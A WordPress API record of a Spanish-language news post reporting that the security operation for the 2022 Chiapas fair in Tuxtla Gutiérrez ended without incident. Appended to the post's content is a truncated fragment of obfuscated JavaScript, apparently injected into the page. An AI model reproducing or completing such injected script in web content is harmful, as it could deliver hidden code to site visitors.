{"id":7464,"date":"2022-12-20T02:54:26","date_gmt":"2022-12-20T02:54:26","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7464"},"modified":"2022-12-20T02:54:27","modified_gmt":"2022-12-20T02:54:27","slug":"concluye-con-saldo-blanco-operativo-feria-chiapas-de-corazon-2022","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7464","title":{"rendered":"Concluye con saldo blanco Operativo Feria Chiapas de Coraz\u00f3n 2022"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"574\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221219-WA0010-1024x574.jpg\" alt=\"\" class=\"wp-image-7465\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221219-WA0010-1024x574.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221219-WA0010-300x168.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221219-WA0010-768x431.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/IMG-20221219-WA0010.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas.- Del 8 al 18 de diciembre se implement\u00f3 el Operativo Interinstitucional con motivo de la Feria Chiapas de Coraz\u00f3n 2022, el cual concluy\u00f3 con saldo blanco, inform\u00f3 la secretaria de Seguridad y Protecci\u00f3n Ciudadana, Gabriela Zepeda Soto, ante la Mesa de Seguridad Estatal que todos los d\u00edas encabeza el gobernador Rutilio Escand\u00f3n Cadenas en Palacio de Gobierno.<\/p>\n\n\n\n<p>Zepeda Soto dio cuenta que, tal y como lo instruy\u00f3 el mandatario estatal, en coordinaci\u00f3n con fuerzas federales, estatales y municipales se llev\u00f3 a cabo un plan estrat\u00e9gico para garantizar la seguridad, el orden y la paz al interior y exterior del parque de feria.<\/p>\n\n\n\n<p>\u201cPor acuerdo de la Mesa de Seguridad Estatal se implement\u00f3 el Operativo Interinstitucional con motivo de la Feria Chiapas de Coraz\u00f3n 2022 del 8 al 18 de diciembre, concluyendo con saldo blanco gracias a la participaci\u00f3n de la ciudadan\u00eda y el trabajo en unidad de autoridades de los tres niveles de gobierno en el fortalecimiento de las acciones en materia de seguridad y prevenci\u00f3n de delitos, as\u00ed como de atenci\u00f3n a las y los visitantes\u201d, declar\u00f3.<\/p>\n\n\n\n<p>Detall\u00f3 que se activaron las Bases de Operaciones Mixtas (BOM), integradas por elementos del Ej\u00e9rcito Mexicano, Guardia Nacional, Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana del Estado y Polic\u00eda Municipal, as\u00ed como de Protecci\u00f3n Civil Estatal y Municipal, durante el desarrollo de las actividades art\u00edsticas, ganaderas y comerciales.<\/p>\n\n\n\n<p>Asimismo, resalt\u00f3 que en el marco de la feria se instalaron stands y m\u00f3dulos para promover los servicios y programas de la SSyPC, tales como las aplicaciones m\u00f3viles C5 y \u201cNo te enganches\u201d, adem\u00e1s de las campa\u00f1as de concientizaci\u00f3n del uso responsable del n\u00famero de emergencia 911 y 089 de denuncia an\u00f3nima, y de prevenci\u00f3n de accidentes de tr\u00e1nsito.<\/p>\n\n\n\n<p>Por su parte, el presidente del Patronato de la Feria, Manuel Pariente Gavito, reconoci\u00f3 el trabajo de las corporaciones de seguridad en el estado, por el trabajo estrat\u00e9gico realizado durante la celebraci\u00f3n de la Feria y el respaldo brindado por el gobernador Rutilio Escand\u00f3n Cadenas.<\/p>\n\n\n\n<p>Finalmente, Zepeda Soto refrend\u00f3 el compromiso de la Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana de garantizar el Estado de derecho y la seguridad en toda la entidad, de acuerdo con las pol\u00edticas p\u00fablicas del gobernador Rutilio Escand\u00f3n Cadenas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Tuxtla Guti\u00e9rrez, Chiapas.- Del 8 al 18 de diciembre se implement\u00f3 el Operativo Interinstitucional con motivo de la Feria Chiapas de Coraz\u00f3n 2022, el cual concluy\u00f3 con saldo blanco, inform\u00f3 la secretaria de Seguridad y Protecci\u00f3n Ciudadana, Gabriela Zepeda Soto, ante la Mesa de Seguridad Estatal que todos los d\u00edas encabeza el gobernador Rutilio Escand\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7465,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7464","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7464","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7464"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7464\/revisions"}],"predecessor-version":[{"id":7466,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7464\/revisions\/7466"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7465"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7464"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7464"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7464"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}